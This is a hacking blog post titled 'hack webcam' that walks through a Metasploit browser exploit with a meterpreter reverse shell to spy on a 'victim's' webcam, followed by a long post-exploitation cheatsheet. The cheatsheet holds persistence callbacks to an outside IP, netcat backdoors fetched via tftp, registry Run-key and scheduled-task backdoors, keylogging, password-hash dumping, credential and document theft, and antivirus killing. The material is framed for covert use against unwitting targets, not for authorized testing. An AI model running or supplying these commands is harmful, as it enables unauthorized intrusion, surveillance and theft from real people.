CATEGORY

CRACKED SOFTWARE (39) downloads (74) EARN MONEY (6) FACEBOOK HACKS (26) tricks (168)

see also

Infolinks In Text Ads

Search This Blog

hack webcam


Open Metasploit and run following commands:

msf>  show exploits


msf>use windows/browser/adobe_cooltype_sing


msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp


msf  exploit(adobe_cooltype_sing) > show options


Module options (exploit/windows/browser/adobe_cooltype_sing):


   Name                Current Setting       Required           Description
   ----                     ---------------               --------               -----------
   SRVHOST            0.0.0.0                   yes              The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT             8080                      yes              The local port to listen on.
   SSL                         false                         no                Negotiate SSL for incoming connections
   SSLCert                                                   no               Path to a custom SSL certificate (default is randomly generated)
   SSLVersion         SSL3                        no               Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                                              no               The URI to use for this exploit (default is random)



Payload options (windows/meterpreter/reverse_tcp):


   Name                  Current            Setting         Required  Description
   ----                    ---------------       --------              -----------
   EXITFUNC        process             yes               Exit technique: seh, thread, process, none
   LHOST                                             yes                The listen address
   LPORT                 4444                 yes               The listen port



Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf  exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) >exploit -j


Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.


msf  exploit(adobe_cooltype_sing) > session -i 1


meterpreter> run webcam


and you will get the webcam of victim. :)


Metasploit Cheatsheet



use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

_________________________________________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

__________________________________________________________________

# shows all the scripts
run [tab]
__________________________________________________________________

# persistence! broken ...if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30

__________________________________________________________________

run get_pidgin_creds

idletime
sysinfo

__________________________________________________________________

# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell
__________________________________________________________________

# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"
__________________________________________________________________

# escalate to system
use priv
getsystem
__________________________________________________________________

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t
__________________________________________________________________

# list top used apps
run prefetchtool -x 20
__________________________________________________________________

# list installed apps
run prefetchtool -p
__________________________________________________________________

run get_local_subnets
__________________________________________________________________

# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office

__________________________________________________________________

# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
__________________________________________________________________

# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
__________________________________________________________________

# does some run wmic commands etc
run winenum

# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
__________________________________________________________________

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
__________________________________________________________________

# vnc / port fwd for linux
run vnc
__________________________________________________________________
# priv esc
run kitrap0d

__________________________________________________________________

run getgui
__________________________________________________________________

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav

run winemun

run memdump

run screen_unlock
__________________________________________________________________

upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"

__________________________________________________________________

getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
__________________________________________________________________

shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
__________________________________________________________________

run msf_bind
run msf_bind -p 1975
rev2self
getuid
__________________________________________________________________

getuid

enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

___________________________________________________________________

# Windows Login Brute Force Meterpreter Script
run winbf -h
___________________________________________________________________

# upload a script or executable and run it
uploadexec

___________________________________________________________________

# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011

___________________________________________________________________

# kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy
Posted by
Labels:

1 comment:

  1. BloggerDecember 6, 2016 at 10:29 PM

    Been using Kaspersky protection for a few years now, I'd recommend this antivirus to everybody.

    ReplyDelete

Subscribe to: Post Comments (Atom)

Blog Archive

like us on fb